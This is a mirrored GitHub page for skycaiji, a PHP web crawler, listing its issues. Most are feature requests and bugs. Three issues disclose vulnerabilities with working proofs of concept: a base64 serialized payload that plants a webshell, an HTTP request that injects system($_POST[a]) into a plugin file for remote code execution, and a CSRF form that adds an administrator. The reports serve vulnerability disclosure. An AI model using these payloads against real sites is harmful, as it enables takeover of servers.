Git Product home page Git Product logo

zorlan / skycaiji Goto Github PK

View Code? Open in Web Editor NEW
1.9K 76.0 567.0 25.73 MB

蓝天采集器是一款开源免费的爬虫系统,仅需点选编辑规则即可采集数据,可运行在本地、虚拟主机或云服务器中,几乎能采集所有类型的网页,无缝对接各类CMS建站程序,免登录实时发布数据,全自动无需人工干预!是网页大数据采集软件中完全跨平台的云端爬虫系统

Home Page: https://www.skycaiji.com

License: Other

PHP 89.70% Less 5.11% SCSS 5.19%
crawler crawling spider webcrawler php

skycaiji's Introduction

将本压缩包上传至您的服务器,如果根目录有站点建议放在子目录里,解压后打开浏览器输入您的服务器域名或ip地址(存放在子目录则加上子目录的名称)进入安装界面。

入门手册:https://www.skycaiji.com/manual

使用协议:https://www.skycaiji.com/licenses

skycaiji's People

Contributors

zorlan avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

skycaiji's Issues

建议内置个微型webserver

挂服务器上有时候会因为大量采集被限制,本地的话一般没事,建议内置个微型webserver.
宝塔、phpstudy神马的不太合适

Skycaiji has a deserialization vulnerability in v2.5.1

I found a deserialization vulnerability in v2.5.1
URL: http://localhost/index.php?s=/admin/mystore/upload

unserialize's parameter can control by uploading the file contains the payload.
/*skycaiji-plugin-start*/TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NDp7czo2OiJwYXJlbnQiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjE6e3M6MTA6IgAqAGhhbmRsZXIiO086MjM6InRoaW5rXGNhY2hlXGRyaXZlclxGaWxlIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjM2MDA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6NzQ6InBocDovL2ZpbHRlci93cml0ZT1zdHJpbmcucm90MTMvcmVzb3VyY2U9PD9jdWMgQHJpbnkoJF9UUkdbX10pOz8+Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtzOjM6InlsZyI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fXM6OToiACoAYXBwZW5kIjthOjE6e2k6MDtzOjg6ImdldEVycm9yIjt9czo3OiIAKgBkYXRhIjthOjE6e2k6MDtzOjM6IjEyMyI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtpOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtyOjU7czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6MTp7aTowO3M6MzoiMTIzIjt9fX19fQ==/*skycaiji-plugin-end*/
We will get a webshell
截屏2022-10-26 02 47 53

感谢分享,我想帮你把代码的注释写好。可以吗?

下载了你的代码。用来学习一下。发现你的代码注释比较少。有一点比较尴尬的问题,为什么你的代码是压缩过的?不方便阅读。不太适合新手的入门和学习。我想把你的代码添加上注释。让更多的人容易看的懂。

建议

初尝试,很给力。根据平时采集常用到的功能,希望增加下列功能:

任务

  1. 增加设置任务采集间隔时间,如按每周/每天/每小时/秒等
  2. 增加设置单条内容采集间隔时间,如毫秒
  3. 增加任务可选择是否记录采集,以便反复采集
  4. 增加按 标题 || 网址 检测是否重复

采集器

  1. 增加采集顺序,如正序倒序随机
  2. 增加headers,包括User-Agent,Content-Type,Cookie,Accept-Encoding,Referer,Host等,可自定义
  3. 增加二级页面/分页的采集
  4. 增加文件下载/跳转页面抓取/Referers信息等

发布

  • 增加发布到远程接口,如url

其他

  • 增加代理

当婊子还要立牌坊?

既然已经选择了开源 还弄乱代码格式是什么意思?不想让人看? IDE一键格式化的事.

反馈

获取内容 字段列表 的字段 建议加上一个获取内容是否为空的判断. 为空跳过.

需求

采集规则的单页抓取 能独立出解析api吗

非常好,建议1

增加代理池:
目前的指定代理IP弹性有限。建议可指定代理池,邮代理池随机IP。

建议老大考虑升级TP5核心

Remote code execution vulnerability in /SkycaijiApp/admin/controller/Develop.php

Vulnerability conditions

  • Website Admin permissions

Vulnerability details

Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()

Code:

...
else{
				
				$module=input('module');
				$copyright=input('copyright');
				$identifier=input('identifier');
				$name=input('name');
				$methods=input('methods/a',array());
				
				if(empty($module)){
					$this->error('请选择类型');
				}
				
				$module=$mfuncApp->format_module($module);
				$copyright=$mfuncApp->format_copyright($copyright);
				$identifier=$mfuncApp->format_identifier($identifier);
				
				if(!$mfuncApp->right_module($module)){
					$this->error('类型错误');
				}
				if(!$mfuncApp->right_identifier($identifier)){
					$this->error('功能标识只能由字母或数字组成,且首个字符必须是字母!');
				}
				if(!$mfuncApp->right_copyright($copyright)){
					$this->error('作者版权只能由字母或数字组成,且首个字符必须是字母!');
				}
				
				$newMethods=array();
				foreach ($methods['method'] as $k=>$v){
					if(preg_match('/^[a-z\_]\w*/',$v)){
						
						foreach ($methods as $mk=>$mv){
							
							$newMethods[$mk][$k]=$mv[$k];
						}
					}
				}
				$methods=$newMethods;
				unset($newMethods);
				
				if(empty($methods['method'])){
					$this->error('请添加方法!');
				}
				
				$app=$mfuncApp->app_name($copyright,$identifier);
				
				$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
				
				if($id>0){
					$this->success('创建成功','Develop/func?app='.$app);
				}else{
					$this->error('创建失败');
				}
			}
		}
....

Vulnerability key code:

$app=$mfuncApp->app_name($copyright,$identifier);
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));`


follow up $mfuncApp->app_name
image
Concatenate $copyright, $identifier directly, then return.
Go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));

follow up $mfuncApp->createApp

$module,$app,array('name'=>$name,'methods'=>$methods)

And the parameters we can control,follow up
$funcFile=$this->filename($module,$app);
image

Return directly after splicing

Continue back to the createApp function
image

There is no filter /* and */ for variables $name
/plugin/func/$module/$copyright$identifier.php

Exp is constructed directly here:

POST /index.php?s=/Admin/Develop/func HTTP/1.1
Host: 172.16.49.3:50004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 179
Origin: http://172.16.49.3:50004
Connection: close
Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df

_usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11

image
check the file
image

Visit /plugin/func/downloadImg/A11B1.php
post: a=command
image

php7.2 图片本地化失败


[ 2020-03-25T00:04:47+08:00 ] 132.232.164.158 GET 域名/index.php?s=/Admin/Api/collect&backstage=1
[ error ] [8192]The each() function is deprecated. This message will be suppressed on further calls
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/020952nkdg66cn1gfl16kd.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/020935kmkghqccfjdkrjvv.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/095225b7ly3cceehccfelf.jpeg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/104308tz4wci494tct2crw.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/110353z3k53trt5nnk5nq3.png): failed to open stream: Connection timed out
[ error ] [2]getimagesize(http://域/data/attachment/portal/201704/06/114136g1nl9ll1ll611lh6.jpg.thumb.jpg): failed to open stream: Connection timed out

后台添加用户CSRF漏洞

描述:
在后台添加用户处,没有验证Referer和增加token,攻击者可构造表单进行CSRF攻击。

漏洞类型:
CSRF

攻击载体:
1.攻击者构造表单,a.com/csrf.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.197.25/skycaiji/index.php?m=admin&c=user&a=add" method="POST">
      <input type="hidden" name="groupid" value="2" />
      <input type="hidden" name="username" value="demo" />
      <input type="hidden" name="password" value="demo123" />
      <input type="hidden" name="repassword" value="demo123" />
      <input type="hidden" name="email" value="admin&#64;admin&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2.网站管理员点击攻击者网站,a.com/csrf.com,即可添加管理员

攻击影响:
攻击者访问此页面即可添加网站管理员账号

页面渲染未加载js脚本

简单模式用那个分析网页功能,不加载js的脚本,有个提示“所见即所得,已过率所有脚本”,和这个有关系吗?
还是chrome启动需要加什么参数吗

两个关于采集到的content的疑问

zorlan,您好:
有两个问题请教:
1.请问我单独采集了url这样的数据,在发布时如何将url跟采集到的content合并在一起发布出去?
2.我在采集时将图片采集到了content中,但是我远程发布到别的vps的时候却没法发布过去,我是将图片和文本内容用|合并在采集到的content中的,可是发布时却只发布文本内容。(测试时能看到图片预览的)

json数据采集问题

我遇到个采集的问题。json数据
比如我这个json是这样的
Image of Yaktocat

data下面有0-20 ,0-20下面comments在里面的0-20才是我要的数据,这个该怎么提取,我试着用正则表达式不行。求解

验证码加载失败

系统 macos,使用浏览器 safari和chrome均不可以正常加载验证码。

建议2

采集器设置=>结果网址过滤:目前好像不支持多规则?

比如我要设置不能包含地址:/jobs/和/cous/ 这样的话没法设置了?

请求头无法利用上cookie缓存数据

采集amazon.com时,由于其默认的地址是**,文字显示是中文,在cookie缓存数据加入对应修改cookie后发现采集时抓取的源码还是中文的

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.